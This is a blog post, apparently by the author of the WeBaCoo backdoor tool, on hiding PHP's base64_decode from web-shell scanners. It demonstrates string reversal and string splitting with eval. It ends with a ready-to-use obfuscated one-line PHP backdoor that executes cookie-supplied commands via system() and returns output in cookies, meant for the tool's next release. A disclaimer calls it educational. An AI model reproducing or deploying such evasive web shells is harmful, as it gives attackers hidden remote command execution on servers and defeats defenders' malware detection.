Bypass base64 decoder detection

Almost two weeks after WeBaCoo’s release, I started to organize the results from various tests under different protection/detection tools for a comprehensive writeup. Something that draw my attention is how easily some malware scanning tools mark as “threat” WeBaCoo’s generated backdoor code. A simple use of the base64 decoder function is enough to trigger scanner’s content matching rulesets no matter what the processing data are. Additionally to this strict approach, I came forward recently in the Internet with some official web backdoor detection tutorials including content matching checks for the decoder function. These two things led me to a small research for finding tricks to bypass such content matching mechanisms.

A list of tools and scripts that marked as “threat” WeBaCoo’s generated code based on the base64 decoder use, is as following (check the first image gallery at the end of the post for report screenshots):

• Linux Malware Detect (website)
• PHP Shell Scanner (website)
• Virus Total (only ESET mark it as threat)
• Look for bad guys script (website)

After inspecting how the above tools work, I thought two main methods that can be used to trick the base64 encoder content matching rules: string reversing and string splitting. These two methods can be combined to create more tricky code, always taking into account the least possible character use. WeBaCoo generates PHP backdoor code, so I will work these methods under PHP. Although the same concept can be applied to other languages too.

String Reversing

Lucky for us PHP provides the strrev() function in order to easily reverse a string. Knowing that base64_decoder was the function name that triggered the above tools, strrev can be used to trick them. Let’s form an example to see that our concept works before proceeding to backdoor alterations.

<?php
//base64 encode of "show me your code"
$data="c2hvdyBtZSB5b3VyIGNvZGU=";
 
//$bd="base64_decode"
$bd=strrev("edoced_46esab");
 
//print decoded data
//eval is used to evaluate string as PHP code
eval("echo \$bd(\$data);");
?>

String Splitting

The concept behind this technique is to split the trigger string (“base64_decode”) into smaller chunks, that can be later concatenated to form the function name.

<?php
//base64 encode of "show me your code"
$data="c2hvdyBtZSB5b3VyIGNvZGU=";
 
//split into two chunks
$ac="base6";
$bc="4_decode";
 
//concat the chunks
$cc=$ac.$bc;
 
//print decoded data
//eval is used to evaluate string as PHP code
eval("echo \$cc(\$data);");
?>

Knowing that the above two techniques work against decoder’s string name detection, they can be combined to form the desired functionality. The following PHP code is a short example of such a combination that is used in the new backdoor code. I will conduct the same tests to see if the new backdoor code successfully passes all of them. You can see the results in the second image gallery at the end of the post.

<?php $c=strrev("edoced_4"."6esab");eval($c("aWYoaXNzZXQoJF9DT09LSUVbJ2NtJ10pKXtvYl9zdGFydCgpO3N5c3RlbShiYXNlNjRfZGVjb2RlKCRfQ09PS0lFWydjbSddKS4nIDI+JjEnKTtzZXRjb29raWUoJF9DT09LSUVbJ2NuJ10sJF9DT09LSUVbJ2NwJ10uYmFzZTY0X2VuY29kZShvYl9nZXRfY29udGVudHMoKSkuJF9DT09LSUVbJ2NwJ10pO29iX2VuZF9jbGVhbigpO30=")); ?>

These two techniques will be implemented in WeBaCoo’s next release after I conclude to the more efficient ways of use.

Initial Code Report Results

New Code Report Results

 
DISCLAIMER: I’m not responsible with what you do with this info. This information is for educational purposes only.
 

A. Bechtsoudis